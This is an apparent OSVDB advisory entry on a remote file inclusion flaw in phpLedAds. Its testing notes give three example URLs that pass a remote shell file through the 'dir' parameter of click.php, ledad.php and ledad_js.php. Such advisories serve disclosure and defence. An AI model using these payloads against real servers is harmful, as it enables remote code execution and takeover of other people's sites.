phpLedAds Multiple Script dir Variable Remote File Inclusion

2006-10-27T01:23:18
ID OSVDB:32608
Type osvdb
Reporter OSVDB
Modified 2006-10-27T01:23:18

Description

Manual Testing Notes

http://[target]/[ledads]/click.php?dir=Sh3ll.txt? http://[target]/[ledads]/ledad.php?dir=Sh3ll.txt? http://[target]/[ledads]/ledad_js.php?dir=Sh3ll.txt?

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0010.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0454.html